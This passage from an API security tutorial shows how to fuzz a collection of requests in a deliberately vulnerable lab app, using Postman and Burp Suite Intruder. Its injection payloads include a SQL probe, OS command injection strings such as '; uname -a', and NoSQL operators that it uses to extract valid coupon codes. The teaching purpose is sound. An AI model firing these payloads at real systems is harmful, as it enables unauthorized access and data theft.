Fuzzing Wide with Postman
Postman really shines when it comes to testing an entire API collection, thanks to the Collection Runner, whereas Burp Suite CE and WFuzz are much better at digging into individual requests. Since there are so many places for an injection vulnerability to hide, it helps to cast a wide net across a collection with Postman and then transition to other tools for deeper testing. Because we will be testing so many requests, I recommend duplicating the entire collection so that we can add variables throughout it. This maintains the integrity of the original collection and lets us develop a baseline of expected responses.
I have renamed the duplicate collection crAPI_Swagger Fuzz. We can also create a fuzzing environment that can be reused from one collection to another.
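Exported Postman environments are plain JSON, which is part of what makes them easy to reuse; a minimal sketch of a fuzzing environment with a single variable might look like this (names and values are illustrative):

```json
{
  "name": "Fuzzing",
  "values": [
    { "key": "fuzz", "value": "", "enabled": true }
  ],
  "_postman_variable_scope": "environment"
}
```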
For injection targets, we will begin by casting a wide net and seeing which requests respond in interesting ways. Let's target the requests that include user input. With this in mind, I have selected the following ten requests:
PUT videos by id
GET videos by id
POST change-email
POST verify-email-token
POST login
GET location
POST check-otp
POST posts
POST validate-coupon
POST orders
Now let's run the Collection Runner against our selected requests in the original collection (crAPI_Swagger) to develop our baseline. Remember that the Collection Runner lets you select the requests you want to test and save the responses.
Select the ten requests listed above. Note that the baseline should consist of well-formed requests and expected responses; the collection should not fail because of missing authorization or resources that cannot be found. In other words, the collection should be in a state where things primarily function as expected. Once again using the Status 200 test set up in previous modules, update your token and run the entire collection to see what your baseline looks like. Take note of how many requests pass and fail.
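For reference, that status check is a short JavaScript snippet on the Tests tab, along these lines:

```javascript
// Runs after each request in the collection and flags anything
// that deviates from the expected 200 baseline.
pm.test("Status code is 200", function () {
    pm.response.to.have.status(200);
});
```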
In this baseline, we can see that there were:
Three 200 Success responses
Three 500 Internal Server Error
Three 404 Not Found
One 403 Forbidden
You can explore the variety of reasons each response was sent, but as long as your requests are well formed, proceed. Now that we have a baseline, let's update our environment with some fuzzing variables.
Depending on information from reconnaissance, you may want to start with a specific fuzzing payload. However, it is easy enough to update a variable's value, so I will stick with a single {{fuzz}} variable. Go through the requests you are targeting and add it wherever user input is found.
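For example, in the body of the POST validate-coupon request, the hard-coded value can be swapped for the variable (the coupon_code field name comes from crAPI; adjust it to match your own collection):

```json
{
  "coupon_code": "{{fuzz}}"
}
```

Postman resolves {{fuzz}} from the active environment at run time, so every targeted request picks up the new payload the moment you change the variable's current value.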
Now run the collection with the fuzz variable set throughout the targeted requests and investigate the results for anomalies.
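If you prefer the command line, Newman (Postman's CLI runner) can execute the same collection; the file names below are placeholders for your own exports, and the fuzz value shown is a simple SQL injection probe:

```bash
# Run the duplicated collection with a fuzz payload injected at runtime.
newman run crAPI_Swagger-Fuzz.postman_collection.json \
  -e fuzzing.postman_environment.json \
  --env-var "fuzz=' OR 1=1--"
```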
In this test the total count was:
One 200 Success
Four 500 Internal Server Error
Three 404 Not Found
One 400 Bad Request
In this case, one request passed, which is interesting enough to warrant exploring the response. Sure enough, the community request had no issues and posted the fuzzing value in a community post. Also make sure to explore the "Failed" results for anything anomalous or interesting; when fuzzing, a verbose error message can be just as valuable as a success. Reviewing these results did not turn up anything else of interest. Next, we will repeat this process with updated fuzzing variables.
Simply update the current value of fuzz with a new payload, run the Collection Runner again, and review the results for anomalies.
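For instance, a follow-up pass might swap the SQL probe for OS command injection strings; a few illustrative values for fuzz:

```
; uname -a
| whoami
`id`
```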
Sure enough, we see very similar results. In this test the total count was:
One 200 Success
Four 500 Internal Server Error
Two 404 Not Found
Three 400 Bad Request
The community post was successful while the others failed in similar ways. There was some deviation in the number of 400 Bad Request responses, but after investigating those results, the responses were expected. This is exactly what you would hope to see: a new baseline developing. When we fuzz with certain types of input, the application behaves in a predictable way; therefore, if we update our fuzz variable to the right value, any change will be much more obvious. Up to this point, we have tried a SQL injection test and an OS injection test. Let's try a NoSQL injection test.
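A common starting point, and one consistent with the '$' parser error we are about to see, is a MongoDB operator expression; for example, set the current value of fuzz to something like:

```
{"$gt": ""}
```

If the application passes this straight into a database query, the operator compares against an empty string and effectively evaluates to true for any real value.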
At first glance, this test is different. The community post was not successful, and upon reviewing the failed results, we see the count has changed:
One 500 Internal Server Error
Eight 400 Bad Request
One 422 Unprocessable Entity
The variation in the results here is worthy of investigation, especially with the new response code. First, the forum request that previously succeeded now returns a 400 with the response body {"error": "invalid character '$' after object key:value pair"}.
The POST validate-coupon request received the 422 Unprocessable Entity response and contains the same error in its response body.
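The error message is itself a clue: it comes from a JSON parser, which tells us the payload landed inside the request body and broke its syntax. A plausible reconstruction, assuming a quoted template like the one used earlier:

```
Template:            {"coupon_code": "{{fuzz}}"}
After substitution:  {"coupon_code": "{"$gt": ""}"}   <-- no longer valid JSON
```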
These two requests are worth exploring further. Proxy them to Burp Suite and send the captured requests to Intruder.
Using Intruder, update the attack positions for the two requests that you are targeting.
Since the NoSQL payload was the one that triggered an anomaly, load Intruder with a NoSQL payload list. Try the attack with Payload Encoding turned both on and off to see whether the responses differ. Send the attack.
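Any standard NoSQL injection wordlist will work here (SecLists includes one, for example); a few representative entries:

```
{"$gt": ""}
{"$ne": null}
{"$nin": [""]}
{"$where": "return true"}
```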
Now we are receiving several 200 Success responses, and by sending statements that evaluate to true against the database, we have obtained valid coupon codes. We have successfully exploited a NoSQL injection vulnerability! Next, let's check out how this would be performed with WFuzz.